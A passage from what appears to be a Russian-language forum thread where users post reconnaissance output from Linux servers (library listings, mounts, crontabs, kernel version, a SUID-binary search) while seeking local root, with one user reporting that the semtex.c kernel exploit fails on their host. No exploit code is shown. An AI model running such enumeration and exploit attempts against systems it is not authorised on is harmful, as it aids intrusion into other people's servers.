lrwxrwxrwx 1 root root 21 2015-01-28 18:11:42.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 16 2015-05-28 01:09:09.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5
-rwxr-xr-x 1 root root 43020 2015-05-27 16:48:30.000000000 +0300 libpam.so.0.81.5
lrwxrwxrwx 1 root root 21 2015-05-28 01:09:09.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2
-rwxr-xr-x 1 root root 8624 2015-05-27 16:48:30.000000000 +0300 libpam_misc.so.0.81.2
lrwxrwxrwx 1 root root 17 2015-05-28 01:09:09.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0
-rwxr-xr-x 1 root root 9868 2015-05-27 16:48:30.000000000 +0300 libpamc.so.0.81.0
lrwxrwxrwx 1 root root 16 2013-10-20 01:10:29.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 127760 2013-10-01 22:18:22.000000000 +0400 libpcre.so.0.0.1
-rwxr-xr-x 1 root root 137944 2015-01-27 22:04:56.000000000 +0300 libpthread-2.5.so
lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so
-rwxr-xr-x 1 root root 84904 2015-01-27 22:04:56.000000000 +0300 libresolv-2.5.so
lrwxrwxrwx 1 root root 16 2015-01-28 18:11:42.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so
-rwxr-xr-x 1 root root 48156 2015-01-27 22:04:56.000000000 +0300 librt-2.5.so
lrwxrwxrwx 1 root root 12 2015-01-28 18:11:42.000000000 +0300 librt.so.1 -> librt-2.5.so
-rwxr-xr-x 1 root root 91892 2011-03-06 07:51:56.000000000 +0300 libselinux.so.1
-rwxr-xr-x 1 root root 243928 2010-03-31 12:26:18.000000000 +0400 libsepol.so.1
lrwxrwxrwx 1 root root 12 2014-10-01 01:12:22.000000000 +0400 libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root 19008 2014-09-18 14:12:28.000000000 +0400 libss.so.2.0
-rwxr-xr-x 1 root root 300636 2015-05-13 13:33:41.000000000 +0300 libssl.so.0.9.8e
lrwxrwxrwx 1 root root 11 2009-09-29 10:32:08.000000000 +0400 libssl.so.4 -> libssl.so.6
lrwxrwxrwx 1 root root 16 2015-05-14 01:08:56.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx 1 root root 19 2009-09-29 10:32:12.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 11636 2007-01-06 16:01:17.000000000 +0300 libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 33852 2015-01-27 22:04:56.000000000 +0300 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2015-01-28 18:11:42.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 13492 2015-01-27 22:04:56.000000000 +0300 libutil-2.5.so
lrwxrwxrwx 1 root root 14 2015-01-28 18:11:42.000000000 +0300 libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx 1 root root 14 2014-10-01 01:12:22.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x 1 root root 14472 2014-09-18 14:12:28.000000000 +0400 libuuid.so.1.2
lrwxrwxrwx 1 root root 22 2014-10-01 01:12:29.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
-rwxr-xr-x 1 root root 37032 2014-09-17 23:19:08.000000000 +0400 libvolume_id.so.0.66.0
lrwxrwxrwx 1 root root 16 2009-10-23 01:10:46.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x 1 root root 31344 2009-09-22 02:37:30.000000000 +0400 libwrap.so.0.7.6
lrwxrwxrwx 1 root root 13 2013-01-18 01:13:38.000000000 +0400 libz.so -> libz.so.1.2.3
lrwxrwxrwx 1 root root 13 2013-01-18 01:13:13.000000000 +0400 libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x 1 root root 75088 2012-07-17 12:32:17.000000000 +0400 libz.so.1.2.3
drwxr-xr-x 2 root root 4096 2011-04-10 01:15:39.000000000 +0400 lsb
drwxr-xr-x 12 root root 4096 2014-12-25 01:09:56.000000000 +0300 modules
drwxr-xr-x 3 root root 4096 2015-01-28 18:11:42.000000000 +0300 rtkaio
drwxr-xr-x 4 root root 4096 2015-06-16 01:09:12.000000000 +0300 security
drwxr-xr-x 3 root root 4096 2015-07-01 04:23:58.000000000 +0300 udev

ls -la --full-time /lib64

Code:
total 25552
drwxr-xr-x 8 root root 4096 2015-07-01 04:24:40.000000000 +0300 .
drwxr-xr-x 28 root root 4096 2015-06-30 23:01:02.000000000 +0300 ..
-rw-r--r-- 1 root root 65 2015-05-12 23:58:28.000000000 +0300 .libcrypto.so.0.9.8e.hmac
lrwxrwxrwx 1 root root 25 2015-05-14 01:08:43.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
-rw-r--r-- 1 root root 65 2015-05-12 23:58:28.000000000 +0300 .libssl.so.0.9.8e.hmac
lrwxrwxrwx 1 root root 22 2015-05-14 01:08:43.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
drwxr-xr-x 2 root root 4096 2014-10-01 01:11:16.000000000 +0400 bdevid
drwxr-xr-x 2 root root 4096 2015-01-29 04:17:01.000000000 +0300 dbus-1
drwxr-xr-x 2 root root 4096 2014-10-01 01:10:52.000000000 +0400 device-mapper
drwxr-xr-x 2 root root 4096 2012-10-31 01:09:48.000000000 +0400 iptables
-rwxr-xr-x 1 root root 144776 2015-01-27 20:33:48.000000000 +0300 ld-2.5.so
lrwxrwxrwx 1 root root 9 2015-01-28 18:11:22.000000000 +0300 ld-linux-x86-64.so.2 -> ld-2.5.so
lrwxrwxrwx 1 root root 20 2015-01-28 18:11:50.000000000 +0300 ld-lsb-x86-64.so -> ld-linux-x86-64.so.2
lrwxrwxrwx 1 root root 20 2011-04-10 01:15:38.000000000 +0400 ld-lsb-x86-64.so.3 -> ld-linux-x86-64.so.2
-rwxr-xr-x 1 root root 8904 2015-01-27 20:33:48.000000000 +0300 libBrokenLocale-2.5.so
lrwxrwxrwx 1 root root 22 2015-01-28 18:11:22.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
-rwxr-xr-x 1 root root 22336 2015-01-27 20:33:48.000000000 +0300 libSegFault.so
lrwxrwxrwx 1 root root 15 2012-03-13 01:11:51.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x 1 root root 27920 2012-02-22 17:57:53.000000000 +0400 libacl.so.1.1.0
-rwxr-xr-x 1 root root 20064 2015-01-27 20:33:48.000000000 +0300 libanl-2.5.so
lrwxrwxrwx 1 root root 13 2015-01-28 18:11:22.000000000 +0300 libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx 1 root root 18 2009-10-06 15:17:14.000000000 +0400 libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x 1 root root 907552 2009-01-21 06:42:23.000000000 +0300 libasound.so.2.0.0
lrwxrwxrwx 1 root root 16 2009-09-29 10:33:40.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x 1 root root 17888 2007-01-06 08:09:58.000000000 +0300 libattr.so.1.1.0
lrwxrwxrwx 1 root root 17 2012-03-13 01:11:49.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
-rwxr-xr-x 1 root root 98920 2012-02-22 19:10:07.000000000 +0400 libaudit.so.0.0.0
lrwxrwxrwx 1 root root 19 2012-03-13 01:11:49.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x 1 root root 62200 2012-02-22 19:10:07.000000000 +0400 libauparse.so.0.0.0
lrwxrwxrwx 1 root root 15 2014-10-01 01:10:44.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x 1 root root 43840 2014-09-18 14:12:06.000000000 +0400 libblkid.so.1.0
-rwxr-xr-x 1 root root 1726296 2015-01-27 20:33:48.000000000 +0300 libc-2.5.so
lrwxrwxrwx 1 root root 11 2015-01-28 18:11:22.000000000 +0300 libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 14 2009-09-29 10:33:39.000000000 +0400 libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 17384 2007-03-14 21:13:01.000000000 +0300 libcap.so.1.10
-rwxr-xr-x 1 root root 197744 2015-01-27 20:33:48.000000000 +0300 libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2015-01-28 18:11:22.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2014-10-01 01:10:44.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 10096 2014-09-18 14:12:06.000000000 +0400 libcom_err.so.2.1
-rwxr-xr-x 1 root root 48600 2015-01-27 20:33:48.000000000 +0300 libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 2015-01-28 18:11:22.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1369312 2015-05-12 23:58:28.000000000 +0300 libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 2009-09-29 10:33:39.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 2015-05-14 01:08:43.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e
-rwxr-xr-x 1 root root 831880 2007-01-07 06:09:55.000000000 +0300 libdb-4.1.so
-rwxr-xr-x 1 root root 927720 2007-01-07 06:09:55.000000000 +0300 libdb-4.2.so
-rwxr-xr-x 1 root root 1008656 2010-07-12 20:09:33.000000000 +0400 libdb-4.3.so
-rwxr-xr-x 1 root root 901352 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.1.so
-rwxr-xr-x 1 root root 1011880 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.2.so
lrwxrwxrwx 1 root root 18 2013-10-20 01:10:44.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
-rwxr-xr-x 1 root root 243288 2013-10-02 01:59:24.000000000 +0400 libdbus-1.so.3.4.0
lrwxrwxrwx 1 root root 31 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02
-r-xr-xr-x 1 root root 6712 2014-09-17 21:57:55.000000000 +0400 libdevmapper-event-lvm2.so.2.02
lrwxrwxrwx 1 root root 46 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
lrwxrwxrwx 1 root root 48 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
-r--r--r-- 1 root root 64678 2014-11-18 13:10:58.000000000 +0300 libdevmapper-event.a
lrwxrwxrwx 1 root root 26 2014-11-19 01:08:46.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root 21856 2014-11-18 13:11:03.000000000 +0300 libdevmapper-event.so.1.02
-r--r--r-- 1 root root 717500 2014-11-18 13:10:52.000000000 +0300 libdevmapper.a
lrwxrwxrwx 1 root root 20 2014-11-19 01:08:46.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x 1 root root 154640 2014-11-18 13:11:03.000000000 +0300 libdevmapper.so.1.02
-rwxr-xr-x 1 root root 23360 2015-01-27 20:33:49.000000000 +0300 libdl-2.5.so
lrwxrwxrwx 1 root root 12 2015-01-28 18:11:22.000000000 +0300 libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx 1 root root 34 2011-09-15 01:15:02.000000000 +0400 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13
-rwxr-xr-x 1 root root 22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13
-r-xr-xr-x 1 root root 22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13-17
lrwxrwxrwx 1 root root 23 2011-09-15 01:15:02.000000000 +0400 libdmraid.so -> libdmraid.so.1.0.0.rc13
-rwxr-xr-x 1 root root 212736 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13
-r-xr-xr-x 1 root root 215256 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13-17
lrwxrwxrwx 1 root root 13 2014-10-01 01:10:44.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 26424 2014-09-18 14:12:06.000000000 +0400 libe2p.so.2.3
lrwxrwxrwx 1 root root 17 2012-06-14 01:12:05.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
-rwxr-xr-x 1 root root 144344 2012-06-13 18:35:35.000000000 +0400 libexpat.so.0.5.0
lrwxrwxrwx 1 root root 16 2014-10-01 01:10:44.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 122296 2014-09-18 14:12:06.000000000 +0400 libext2fs.so.2.4
-rwxr-xr-x 1 root root 58400 2014-09-18 05:58:04.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 28 2014-10-01 01:10:09.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root 23 2009-09-29 10:33:39.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 647608 2009-03-25 04:47:43.000000000 +0300 libglib-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 13520 2009-03-25 04:47:43.000000000 +0300 libgmodule-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 262904 2009-03-25 04:47:43.000000000 +0300 libgobject-2.0.so.0.1200.3
lrwxrwxrwx 1 root root 26 2009-09-29 10:33:39.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 19176 2009-03-25 04:47:43.000000000 +0300 libgthread-2.0.so.0.1200.3
-rwxr-xr-x 1 root root 31576 2007-03-15 06:16:08.000000000 +0300 libiw.so.28
-rwxr-xr-x 1 root root 9472 2007-01-06 10:55:38.000000000 +0300 libkeyutils-1.2.so
lrwxrwxrwx 1 root root 18 2009-09-29 10:33:39.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
-r--r--r-- 1 root root 5902120 2014-09-17 21:57:53.000000000 +0400 liblvm2cmd.a
lrwxrwxrwx 1 root root 18 2014-10-01 01:10:52.000000000 +0400 liblvm2cmd.so -> liblvm2cmd.so.2.02
-r-xr-xr-x 1 root root 804632 2014-09-17 21:57:55.000000000 +0400 liblvm2cmd.so.2.02
-rwxr-xr-x 1 root root 614992 2015-01-27 20:33:49.000000000 +0300 libm-2.5.so
lrwxrwxrwx 1 root root 11 2015-01-28 18:11:22.000000000 +0300 libm.so.6 -> libm-2.5.so
-rwxr-xr-x 1 root root 114352 2015-01-27 20:33:49.000000000 +0300 libnsl-2.5.so
lrwxrwxrwx 1 root root 13 2015-01-28 18:11:22.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so
-rwxr-xr-x 1 root root 43128 2015-01-27 20:33:49.000000000 +0300 libnss_compat-2.5.so
lrwxrwxrwx 1 root root 20 2015-01-28 18:11:22.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so
-rwxr-xr-x 1 root root 799680 2015-01-05 13:12:31.000000000 +0300 libnss_db-2.2.so
lrwxrwxrwx 1 root root 16 2015-01-06 01:08:40.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so
-rwxr-xr-x 1 root root 23736 2015-01-27 20:33:49.000000000 +0300 libnss_dns-2.5.so
lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so
-rwxr-xr-x 1 root root 53880 2015-01-27 20:33:49.000000000 +0300 libnss_files-2.5.so
lrwxrwxrwx 1 root root 19 2015-01-28 18:11:22.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so
-rwxr-xr-x 1 root root 24736 2015-01-27 20:33:49.000000000 +0300 libnss_hesiod-2.5.so
lrwxrwxrwx 1 root root 20 2015-01-28 18:11:22.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
-rwxr-xr-x 1 root root 3185264 2015-06-15 15:38:14.000000000 +0300 libnss_ldap-2.5.so
lrwxrwxrwx 1 root root 18 2015-06-16 01:09:08.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so
-rwxr-xr-x 1 root root 53544 2015-01-27 20:33:49.000000000 +0300 libnss_nis-2.5.so
lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so
-rwxr-xr-x 1 root root 62944 2015-01-27 20:33:49.000000000 +0300 libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 21 2015-01-28 18:11:22.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root 16 2015-05-28 01:08:58.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5
-rwxr-xr-x 1 root root 46800 2015-05-27 16:48:51.000000000 +0300 libpam.so.0.81.5
lrwxrwxrwx 1 root root 21 2015-05-28 01:08:58.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2
-rwxr-xr-x 1 root root 13456 2015-05-27 16:48:51.000000000 +0300 libpam_misc.so.0.81.2
lrwxrwxrwx 1 root root 17 2015-05-28 01:08:58.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0
-rwxr-xr-x 1 root root 11264 2015-05-27 16:48:51.000000000 +0300 libpamc.so.0.81.0
lrwxrwxrwx 1 root root 16 2013-10-20 01:10:04.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 129984 2013-10-01 22:15:48.000000000 +0400 libpcre.so.0.0.1
-rwxr-xr-x 1 root root 61248 2013-10-02 00:37:04.000000000 +0400 libproc-3.2.7.so
-rwxr-xr-x 1 root root 149968 2015-01-27 20:33:50.000000000 +0300 libpthread-2.5.so
lrwxrwxrwx 1 root root 17 2015-01-28 18:11:22.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so
-rwxr-xr-x 1 root root 92816 2015-01-27 20:33:50.000000000 +0300 libresolv-2.5.so
lrwxrwxrwx 1 root root 16 2015-01-28 18:11:22.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so
-rwxr-xr-x 1 root root 53448 2015-01-27 20:33:50.000000000 +0300 librt-2.5.so
lrwxrwxrwx 1 root root 12 2015-01-28 18:11:22.000000000 +0300 librt.so.1 -> librt-2.5.so
-rwxr-xr-x 1 root root 95464 2011-03-06 07:48:31.000000000 +0300 libselinux.so.1
-rwxr-xr-x 1 root root 159592 2009-09-04 02:47:06.000000000 +0400 libsemanage.so.1
-rwxr-xr-x 1 root root 247496 2010-03-31 12:17:32.000000000 +0400 libsepol.so.1
lrwxrwxrwx 1 root root 12 2014-10-01 01:10:44.000000000 +0400 libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root 26688 2014-09-18 14:12:06.000000000 +0400 libss.so.2.0
-rwxr-xr-x 1 root root 323528 2015-05-12 23:58:28.000000000 +0300 libssl.so.0.9.8e
lrwxrwxrwx 1 root root 11 2009-09-29 10:33:39.000000000 +0400 libssl.so.4 -> libssl.so.6
lrwxrwxrwx 1 root root 16 2015-05-14 01:08:43.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx 1 root root 19 2009-09-29 10:33:39.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 15584 2007-01-06 19:58:47.000000000 +0300 libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 36200 2015-01-27 20:33:50.000000000 +0300 libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2015-01-28 18:11:22.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 18152 2015-01-27 20:33:50.000000000 +0300 libutil-2.5.so
lrwxrwxrwx 1 root root 14 2015-01-28 18:11:22.000000000 +0300 libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx 1 root root 14 2014-10-01 01:10:44.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x 1 root root 17936 2014-09-18 14:12:06.000000000 +0400 libuuid.so.1.2
lrwxrwxrwx 1 root root 22 2014-10-01 01:11:15.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
-rwxr-xr-x 1 root root 33792 2014-09-17 22:43:42.000000000 +0400 libvolume_id.so.0.66.0
lrwxrwxrwx 1 root root 16 2009-10-23 01:10:41.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x 1 root root 37368 2009-09-22 02:29:33.000000000 +0400 libwrap.so.0.7.6
lrwxrwxrwx 1 root root 13 2013-01-18 01:13:05.000000000 +0400 libz.so -> libz.so.1.2.3
lrwxrwxrwx 1 root root 13 2013-01-18 01:11:17.000000000 +0400 libz.so.1 -> libz.so.1.2.3
-rwxr-xr-x 1 root root 85544 2012-07-17 12:32:04.000000000 +0400 libz.so.1.2.3
drwxr-xr-x 2 root root 4096 2015-01-28 18:11:22.000000000 +0300 rtkaio
drwxr-xr-x 4 root root 4096 2015-06-16 01:09:08.000000000 +0300 security

mount

Code:
/dev/sda5 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/sda8 on /home type ext3 (rw,nosuid,noatime,usrquota,grpquota)
/dev/sda3 on /usr type ext3 (rw,usrquota,grpquota)
/dev/sda2 on /var type ext3 (rw,nosuid,usrquota,grpquota)
/dev/sda1 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1G,nr_inodes= 256k)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/tmp on /tmp type none (rw,noexec,nosuid,bind)

cat /etc/issue

Code:
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.

cat /etc/crontab

Code:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

ls -la /etc/cron.hourly

Code:
-rwxr-xr-x 1 root root 1683 Nov 21 2014 check_raid_status
-rwxr-xr-x 1 root root 390 May 18 2011 mcelog.cron

ls -la /etc/cron.daily

Code:
-rwxr-xr-x 1 root root 379 Mar 28 2007 0anacron
lrwxrwxrwx 1 root root 39 Jan 18 2013 0logwatch -> /usr/share/logwatch/scripts/logwatch.pl
-rwxr-xr-x 1 root root 118 Jan 20 20:14 cups
-rwxr-xr-x 1 root root 219 Jun 6 2013 logrotate
-rwxr-xr-x 1 root root 418 May 30 2012 makewhatis.cron
-rwxr-xr-x 1 root root 137 Sep 3 2009 mlocate.cron
-rwxr-xr-x 1 root root 2181 Jun 21 2006 prelink
-rwxr-xr-x 1 root root 1746 May 14 2012 rkhunter
-rwxr-xr-x 1 adegtyarev wheel 322 Sep 17 2013 rpaf_ips
-rwxr-xr-x 1 root root 296 Dec 9 2014 rpm
-rwxr-xr-x 1 root root 354 Aug 11 2010 tmpwatch

ls -la /etc/cron.monthly

Code:
-rwxr-xr-x 1 root root 381 Mar 28 2007 0anacron

ls -la /etc/cron.weekly

Code:
-rwxr-xr-x 1 root root 380 Mar 28 2007 0anacron
-rwxr-xr-x 1 root root 2843 Jan 9 2013 99-raid-check
-rwxr-xr-x 1 root root 414 May 30 2012 makewhatis.cron

cat /proc/version

Code:
Linux version 2.6.18-400.1.1.el5 (mockbuild@builder17.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-55)) #1 SMP Thu Dec 18 00:59:53 EST 2014

cat /proc/sys/vm/mmap_min_addr

Code:
4096

pwd

ls -la /usr/bin/staprun

find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-rwsr-x--- 1 root dbus 48152 Oct 2 2013 /lib64/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 61656 Nov 8 2012 /bin/mount
-rwsr-x--- 1 root wheel 28336 Mar 21 2012 /bin/su
-rwsr-xr-x 1 root root 41592 Nov 8 2012 /bin/umount
-rwsr-xr-x 1 root root 2078708 Feb 22 2012 /opt/suphp/sbin/suphp
-rwsr-xr-x 1 root root 19768 May 27 16:48 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 75504 May 6 12:41 /sbin/umount.nfs4
-rwsr-xr-x 1 root root 75504 May 6 12:41 /sbin/umount.nfs
-rwsr-xr-x 1 root root 75496 May 6 12:41 /sbin/mount.nfs
-rwsr-x--- 1 root ecryptfs 19824 Feb 23 2012 /sbin/mount.ecryptfs_private
-rwsr-xr-x 1 root root 75504 May 6 12:41 /sbin/mount.nfs4
-rwsr-xr-x 1 root root 14112 May 27 16:48 /sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 176616 Feb 22 2012 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 1166176 Oct 25 2012 /usr/sbin/exim
-rwsr-xr-x 1 root root 8848 Sep 22 2014 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 200671 Sep 22 2014 /usr/kerberos/bin/ksu
-rwsr-xr-x 1 root root 28584 Sep 17 2014 /usr/bin/newgrp
-rwsr-xr-x 1 root root 120784 Oct 2 2009 /usr/bin/incrontab
-rwsr-xr-x 1 root root 51752 Sep 17 2014 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 50696 Sep 17 2014 /usr/bin/chage
-rwsr-sr-x 1 root root 315640 Feb 23 2012 /usr/bin/crontab
---s--x--x 2 root root 190912 Mar 10 2014 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 75264 Jan 9 2013 /usr/bin/quota
-rwsr-xr-x 1 root root 15552 Nov 7 2011 /usr/bin/rlogin
-rwsr-xr-x 1 root root 27936 Aug 11 2010 /usr/bin/passwd
---s--x--x 2 root root 190912 Mar 10 2014 /usr/bin/sudo
-rwsr-xr-x 1 root root 20384 Nov 7 2011 /usr/bin/rcp
-rwsr-xr-x 1 root root 49392 Oct 8 2014 /usr/bin/at
-rws--x--x 1 root root 22200 Nov 8 2012 /usr/bin/chfn
-rwsr-xr-x 1 root root 11328 Nov 7 2011 /usr/bin/rsh
-rwsr-xr-x 1 root root 18606 Feb 22 2012 /usr/local/apache/bin/suexec
-rwsr-xr-x 1 root root 18606 Feb 22 2012 /usr/local/apache.backup/bin/suexec

grimnir

15.07.2015, 13:12

semtex.c не берет (http://packetstormsecurity.com/files/121616/semtex.c)

Code:
$ uname -a
Linux host.com 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot
total 49531
dr-xr-xr-x. 5 root root 1024 Jul 19 2013 .
dr-xr-xr-x. 23 root root 4096 Jul 9 08:33 ..
-rw-r--r--. 1 root root 171 Jul 17 2013 .vmlinuz-2.6.32-358.14.1.el6.x86_64.hmac
-rw-r--r--. 1 root root 166 Feb 22 2013 .vmlinuz-2.6.32-358.el6.x86_64.hmac
-rw-r--r--. 1 root root 2408392 Jul 17 2013 System.map-2.6.32-358.14.1.el6.x86_64
-rw-r--r--. 1 root root 2407466 Feb 22 2013 System.map-2.6.32-358.el6.x86_64
-rw-r--r--. 1 root root 104086 Jul 17 2013 config-2.6.32-358.14.1.el6.x86_64
-rw-r--r--. 1 root root 104081 Feb 22 2013 config-2.6.32-358.el6.x86_64
drwxr-xr-x. 3 root root 1024 Jul 19 2013 efi
drwxr-xr-x. 2 root root 1024 Oct 15 2014 grub
-rw-r--r--. 1 root root 16210951 Jul 19 2013 initramfs-2.6.32-358.14.1.el6.x86_64.img
-rw-r--r--. 1 root root 16206526 Jul 19 2013 initramfs-2.6.32-358.el6.x86_64.img
-rw------- 1 root root 4563905 Apr 16 02:54 initrd-2.6.32-358.14.1.el6.x86_64kdump.img
drwx------. 2 root root 12288 Jul 19 2013 lost+found
-rw-r--r--. 1 root root 185902 Jul 17 2013 symvers-2.6.32-358.14.1.el6.x86_64.gz
-rw-r--r--. 1 root root 185734 Feb 22 2013 symvers-2.6.32-358.el6.x86_64.gz
-rwxr-xr-x. 1 root root 4045680 Jul 17 2013 vmlinuz-2.6.32-358.14.1.el6.x86_64
-rwxr-xr-x. 1 root root 4043888 Feb 22 2013 vmlinuz-2.6.32-358.el6.x86_64
$ lls -la --full-time /lib

$ lls -la --full-time /lib64

$ mount
/dev/sda2 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0)
